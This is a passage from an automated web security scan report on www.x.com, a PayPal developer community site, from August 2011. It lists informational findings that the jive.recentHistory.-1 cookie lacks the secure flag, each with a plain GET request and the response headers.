"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.169. https://www.x.com/message/215291

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215291

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/215291 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c34373636333b312c35343035383b312c35333137323b312c35333135383b312c35333235323b312c35333331323b312c35333331393b312c35333037353b312c35333334333b312c35333539323b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:37 GMT; Path=/
Vary: User-Agent
JP: D=173612 t=1313157516935709
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.170. https://www.x.com/people/BaldGeek

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/BaldGeek

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/BaldGeek HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/xcommerce-blogs?view=blog
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323237363b31342c323030383b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:38:49 GMT; Path=/
Vary: User-Agent
JP: D=151430 t=1313156329683258
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.171. https://www.x.com/people/CorinneSherman

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/CorinneSherman

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/CorinneSherman HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c38393433393b332c323030383b332c35333735313b332c35333436333b332c35353331393b332c35333437343b332c35373137393b332c3133363935343b332c3133373131353b332c36303039313b; Expires=Sun, 11-Sep-2011 13:51:54 GMT; Path=/
Vary: User-Agent
JP: D=153786 t=1313157114086096
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.172. https://www.x.com/people/GiancarloUk2

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/GiancarloUk2

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/GiancarloUk2 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38383139383b332c3131353037373b332c3130383730353b332c3131303734313b332c3131303831343b332c38323534333b332c3131353130373b332c38353530363b332c3131313737343b332c38373839383b; Expires=Sun, 11-Sep-2011 13:52:29 GMT; Path=/
Vary: User-Agent
JP: D=109527 t=1313157149159421
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.173. https://www.x.com/people/IndieReign

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/IndieReign

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/IndieReign HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3134303730373b332c38383139383b332c38373839383b332c3134313133383b332c38353530363b332c3134303532383b332c3131353130373b332c3131303734313b332c3131313737343b332c3131353037373b; Expires=Sun, 11-Sep-2011 13:52:30 GMT; Path=/
Vary: User-Agent
JP: D=98253 t=1313157150770204
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.174. https://www.x.com/people/JasonVenner

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/JasonVenner

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/JasonVenner HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c3133383538323b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b; Expires=Sun, 11-Sep-2011 13:51:49 GMT; Path=/
Vary: User-Agent
JP: D=146802 t=1313157109565171
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.175. https://www.x.com/people/MrcheckAPX

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/MrcheckAPX

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/MrcheckAPX HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:48 GMT; Path=/
Vary: User-Agent
JP: D=97089 t=1313157168042186
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.176. https://www.x.com/people/PP_Igor

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_Igor

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PP_Igor HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:09 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c34383739343b332c31303737303b332c31393037313b332c33353136303b332c35333639373b332c38383732373b332c39343632373b332c38303434333b332c36363938333b332c37383635393b; Expires=Sun, 11-Sep-2011 13:52:09 GMT; Path=/
Vary: User-Agent
JP: D=77818 t=1313157129602041
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.177. https://www.x.com/people/PP_MTS_Andre

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Andre

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PP_MTS_Andre HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=...[SNIP]...; Expires=Sun, 11-Sep-2011 13:52:06 GMT; Path=/
Vary: User-Agent
JP: D=85787 t=1313157126041615
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.178. https://www.x.com/people/PP_MTS_Chad

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Chad

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PP_MTS_Chad HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c33353136303b332c38383732373b332c39343632373b332c38303434333b332c36363938333b332c37383635393b332c35353331393b332c38393433393b332c35333436333b332c323030383b; Expires=Sun, 11-Sep-2011 13:52:04 GMT; Path=/
Vary: User-Agent
JP: D=167980 t=1313157123846369
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.179. https://www.x.com/people/PP_MTS_GuidoT

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_GuidoT

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PP_MTS_GuidoT HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:07 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=...[SNIP]...; Expires=Sun, 11-Sep-2011 13:52:07 GMT; Path=/
Vary: User-Agent
JP: D=96030 t=1313157127847926
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.180. https://www.x.com/people/PP_MTS_Magarvin

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Magarvin

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PP_MTS_Magarvin HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c35333639373b332c33353136303b332c38383732373b332c39343632373b332c38303434333b332c36363938333b332c37383635393b332c35353331393b332c38393433393b332c35333436333b; Expires=Sun, 11-Sep-2011 13:52:04 GMT; Path=/
Vary: User-Agent
JP: D=130947 t=1313157124385931
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.181. https://www.x.com/people/PP_MTS_Patrick

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Patrick

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PP_MTS_Patrick HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=...[SNIP]...; Expires=Sun, 11-Sep-2011 13:52:13 GMT; Path=/
Vary: User-Agent
JP: D=143994 t=1313157132945144
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.182. https://www.x.com/people/PayPalXadmin

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPalXadmin

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PayPalXadmin HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:39 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:39 GMT; Path=/
Vary: User-Agent
JP: D=96924 t=1313157159108661
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.183. https://www.x.com/people/PayPal_Carolyn

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPal_Carolyn

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PayPal_Carolyn HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c323030383b332c35333437343b332c3133363935343b332c3133373131353b332c35333735313b332c3133383538323b332c36303039313b332c3133373331333b332c35353331393b332c3133363236393b; Expires=Sun, 11-Sep-2011 13:51:51 GMT; Path=/
Vary: User-Agent
JP: D=182753 t=1313157111682138
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.184. https://www.x.com/people/PayPal_Sudha

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPal_Sudha

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PayPal_Sudha HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333436333b332c36303039313b332c323030383b332c35333437343b332c3133363935343b332c3133373131353b332c35333735313b332c3133383538323b332c3133373331333b332c35353331393b; Expires=Sun, 11-Sep-2011 13:51:52 GMT; Path=/
Vary: User-Agent
JP: D=104130 t=1313157112744233
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.185. https://www.x.com/people/PayPal_ToddS

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPal_ToddS

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PayPal_ToddS HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=...[SNIP]...; Expires=Sun, 11-Sep-2011 13:52:14 GMT; Path=/
Vary: User-Agent
JP: D=172832 t=1313157134792842
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.186. https://www.x.com/people/Praveen

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Praveen

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Praveen HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=...[SNIP]...; Expires=Sun, 11-Sep-2011 13:51:53 GMT; Path=/
Vary: User-Agent
JP: D=139937 t=1313157113112925
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.187. https://www.x.com/people/Praveen/blog/2011/01/31/icanhas-instant-app-approval

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Praveen/blog/2011/01/31/icanhas-instant-app-approval

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Praveen/blog/2011/01/31/icanhas-instant-app-approval HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=...[SNIP]...; Expires=Sun, 11-Sep-2011 13:51:53 GMT; Path=/
Vary: User-Agent
JP: D=129836 t=1313157113665921
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.188. https://www.x.com/people/RightWayMail

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/RightWayMail

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/RightWayMail HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3134313133383b332c3131353037373b332c38323534333b332c3130383730353b332c3131303831343b332c38383139383b332c3131303734313b332c3131353130373b332c38353530363b332c3131313737343b; Expires=Sun, 11-Sep-2011 13:52:29 GMT; Path=/
Vary: User-Agent
JP: D=143442 t=1313157149181583
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.189. https://www.x.com/people/S.Aijaz

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/S.Aijaz

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/S.Aijaz HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=...[SNIP]...; Expires=Sun, 11-Sep-2011 13:52:11 GMT; Path=/
Vary: User-Agent
JP: D=107761 t=1313157131723635
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.190. https://www.x.com/people/SRS

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/SRS

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/SRS HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
